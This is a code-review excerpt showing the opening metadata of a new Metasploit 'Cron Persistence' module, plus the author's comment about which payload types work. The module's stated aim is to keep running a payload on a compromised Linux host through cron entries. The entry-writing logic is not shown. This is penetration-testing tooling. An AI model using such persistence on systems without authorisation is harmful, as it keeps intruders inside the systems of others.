modules/exploits/linux/local/cron_persistence.rb

```diff
@@ -0,0 +1,138 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/post/file'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Cron Persistence',
+        'Description'    => %q(
+          This module will create a cron or crontab entry to execute a payload.
+          The module includes the ability to automatically clean up those entries to prevent multiple executions.
+          syslog will get a copy of the cron entry.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'h00die <mike@shorebreaksecurity.com>'
+          ],
+        'Platform'       => ['unix', 'linux'],
+        'Targets'        =>
+          [
+            [ 'Cron',           { 'path' => '/etc/cron.d' } ],
+            [ 'User Crontab',   { 'path' => '/var/spool/cron' } ],
+            [ 'System Crontab', { 'path' => '/etc' } ]
+          ],
+        'DefaultTarget'  => 1,
+        'Arch'           => ARCH_CMD,
+        'Payload'        =>
+        {
+          'BadChars'   => "#%\x10\x13", # % always seems to fail, # is for comments
+          'Compat'     =>
+          {
+            'PayloadType'  => 'cmd',
+            'RequiredCmd'  => 'generic perl ruby python'
```

Comment:
Can't remember between the 3 modules.  I know service needs to have something not threaded or else it keeps trying to restart it.  However, for cron, I don't quite remember.  I know these work, just can't remember